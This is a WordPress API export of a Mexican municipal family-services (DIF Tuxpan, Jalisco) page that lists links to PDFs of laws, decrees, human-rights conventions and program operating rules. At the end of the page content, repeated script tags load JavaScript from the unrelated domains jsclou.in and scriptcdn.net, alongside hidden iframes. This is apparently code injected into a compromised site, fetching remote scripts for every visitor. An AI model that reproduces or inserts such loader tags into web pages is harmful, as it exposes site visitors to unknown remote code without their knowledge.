{"id":3229,"date":"2018-03-26T13:35:55","date_gmt":"2018-03-26T19:35:55","guid":{"rendered":"http:\/\/diftuxpan.com\/web1\/?page_id=3229"},"modified":"2022-02-15T14:29:40","modified_gmt":"2022-02-15T20:29:40","slug":"8-2e","status":"publish","type":"page","link":"https:\/\/diftuxpan.com\/web1\/8-2e\/","title":{"rendered":"Decretos, Acuerdos,Criterios y Pol\u00edticas, Reglas de Operaci\u00f3n y dem\u00e1s Normas Jur\u00eddicas"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/sistema_dif_tuxpan.pdf\">Decreto creaci\u00f3n Sistema DIF del Municipio de Tuxpan,Jalisco<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"http:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/rop_2017_desayunos_escolares_poej-1.pdf\">Desayunos Escolares<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Constituci\u00f3n-Pol\u00edtica-M\u00e9xico.pdf\">Constituci\u00f3n Pol\u00edtica M\u00e9xico<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/C\u00d3DIGO-PENAL-FEDERAL.pdf\">C\u00d3DIGO PENAL FEDERAL<\/a> <a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-DE-ASISTENCIA-SOCIAL.pdf\">LEY DE ASISTENCIA SOCIAL<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"> <a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-FEDERAL-DE-LAS-RESPONSABILIDADES-DE-LOS-SERVIDORESE-P\u00daBLICOS.pdf\">LEY FEDERAL DE LAS RESPONSABILIDADES DE LOS SERVIDORESE P\u00daBLICOS<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-FEDERAL-DE-TRANSPARENCIA-Y-ACCESO-A-LA-INFORMACI\u00d3N-P\u00daBLICA.pdf\">LEY FEDERAL DE TRANSPARENCIA Y ACCESO A LA INFORMACI\u00d3N P\u00daBLICA<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"> <a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-FEDERAL-DEL-TRABAJO.pdf\">LEY FEDERAL DEL TRABAJO<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-GENERAL-DE-ACCESO-DE-LAS-MUJERES-A-UNA-VUDA-LIBRE-DE-VIOLENCIA.pdf\">LEY GENERAL DE ACCESO DE LAS MUJERES A UNA VUDA LIBRE DE VIOLENCIA<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"> <a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-GENERAL-DE-ARCHIVOS.pdf\">LEY GENERAL DE ARCHIVOS<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"> <a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-GENERAL-DE-LOS-DERECHOS-DE-NI\u00d1AS-NI\u00d1OS-Y-ADOLESCENTES.pdf\">LEY GENERAL DE LOS DERECHOS DE NI\u00d1AS NI\u00d1OS Y ADOLESCENTES<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-GENERAL-DE-PROTECCI\u00d3N-DE-DATOS-PERSONALES-EN-POSESI\u00d3N-DE-SUJETOS-OBLIGADOS.pdf\">LEY GENERAL DE PROTECCI\u00d3N DE DATOS PERSONALES EN POSESI\u00d3N DE SUJETOS OBLIGADOS<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"> <a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/LEY-GENERAL-PARA-LA-IGUALDAD-ENTRE-MUJERES-Y-LOS-HOMBRES.pdf\">LEY GENERAL PARA LA IGUALDAD ENTRE MUJERES Y LOS HOMBRES<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/NOM-004-SSA3-2012.pdf\">NORMA Oficial Mexicana NOM-004-SSA3-2012, Del expediente cl\u00ednico.\u00a0<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Reg_LFTAIPG.pdf\">REGLAMENTO DE LA LEY FEDERAL DE TRANSPARENCIA Y ACCESO A LA<br \/>\nINFORMACI\u00d3N P\u00daBLICA GUBERNAMENTAL<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Reg_LGAMVLV.pdf\">REGLAMENTO DE LA LEY GENERAL DE ACCESO DE LAS MUJERES A UNA VIDA LIBRE<br \/>\nDE VIOLENCIA<br \/>\n<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"> <a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Convencion-Americana-sobre-Derechos-Humanos.pdf\">Convencion Americana sobre Derechos Humanos<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Convenci\u00f3n-sobre-los-derechos-de-los-Ni\u00f1os.pdf\">Convenci\u00f3n sobre los derechos de los Ni\u00f1os<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Convenci\u00f3n-sobre-los-Derechos-del-Ni\u00f1o.pdf\">Convenci\u00f3n sobre los Derechos del Ni\u00f1o<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Declaraci\u00f3n-de-los-Derechos-de-los-Impedidos.pdf\">Declaraci\u00f3n de los Derechos de los Impedidos<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Declaraci\u00f3n-de-los-Derechos-del-Retrasado-Mental.pdf\">Declaraci\u00f3n de los Derechos del Retrasado Mental<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Pacto-Internacional-de-Derechos-Civiles-y-Pol\u00edticos.pdf\">Pacto Internacional de Derechos Civiles y Pol\u00edticos<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Pacto-Internacional-de-Derechos-Econ\u00f3micos-Sociales-y-Culturales.pdf\">Pacto Internacional de Derechos Econ\u00f3micos Sociales y Culturales<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"http:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Manual-operativo-Asistencia-Infantil-Comunitaria-2012.pdf\">Manual Operativo Asistencia Infantil Comunitaria 2012<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"http:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/manual_op_asistencia_operacional_trabajo_social_a_dif_mpales_3.pdf\">Manual Operativo Asistencia Operacional Trabajo Social Sistema DIF Municipales<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"http:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/rop_2017_ayuda_alimentaria_directa_poej.pdf\">Ayuda Alimentaria Directa PAAD 2017<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"http:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/rop_2017_desayunos_escolares_poej-1.pdf\">Reglas de Operaci\u00f3n Desayunos Escolares 2017<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"http:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/MANUAL-OPERATIVO-UAVI.pdf\">Manual Operativo Unidades de Atencion de la Violencia Intrafamiliar UAVI<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"http:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/CAPACITACION-PARA-EL-AUTOEMPLEO.pdf\">Capacitaci\u00f3n para el Autoempleo\u00a0 Secretaria del Trabajo y Previsi\u00f3n social-Servicio Nacional de Empleo SNE<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/Acuerdo_Plan_Verificacion_2021_Comentado_PNormativos.pdf\">Acuerdo Plan Verificaci\u00f3n\u00a0 y Vigilancia\u00a0 y Metodolog\u00eda 2021<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/AGP_013_2021.pdf\">Acuerdo General de Procedimientos\u00a0 013<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/AGP_ITEI_014_2021_SUSPENSI\u00d3N_DE_T\u00c9RMINOS.pdf\">Acuerdo General Suspensi\u00f3n de T\u00e9rminos 014<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/agp-itei-022-2021.pdf\">\u00a0<\/a><a style=\"color: #333399;\" href=\"https:\/\/itei.us14.list-manage.com\/track\/click?u=c09f9328e03a24087dfb717d6&amp;id=13b6fdfe7d&amp;e=097aea009f\" target=\"_blank\" rel=\"noopener noreferrer\" data-saferedirecturl=\"https:\/\/www.google.com\/url?q=https:\/\/itei.us14.list-manage.com\/track\/click?u%3Dc09f9328e03a24087dfb717d6%26id%3D13b6fdfe7d%26e%3D097aea009f&amp;source=gmail&amp;ust=1626187365430000&amp;usg=AFQjCNEPIZFLGUxOZCvaFcZ5H38yx2sJyA\">\u201cRecomendaciones Generales en materia de Transparencia y Acceso a la Informaci\u00f3n P\u00fablica con motivo del procedimiento de entrega-recepci\u00f3n a realizarse por el Poder Ejecutivo, el Poder Legislativo, y las Administraciones Municipales del Estado de Jalisco\u201d.<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/03\/AGP_ITEI_041_2021-1.pdf\">&#8220;Acuerdo General Modificaci\u00f3n de Calendario Oficial de d\u00edas inh\u00e1biles del Instituto para el 2021 y 2022&#8221;<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe loading=\"lazy\" style=\"display: none;\" src=\"about:blank\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe loading=\"lazy\" style=\"display: none;\" src=\"about:blank\" width=\"300\" height=\"150\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Decreto creaci\u00f3n Sistema DIF del Municipio de Tuxpan,Jalisco Desayunos Escolares Constituci\u00f3n Pol\u00edtica M\u00e9xico C\u00d3DIGO PENAL FEDERAL LEY DE ASISTENCIA SOCIAL LEY FEDERAL DE LAS RESPONSABILIDADES<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/3229"}],"collection":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/comments?post=3229"}],"version-history":[{"count":20,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/3229\/revisions"}],"predecessor-version":[{"id":6296,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/3229\/revisions\/6296"}],"wp:attachment":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/media?parent=3229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}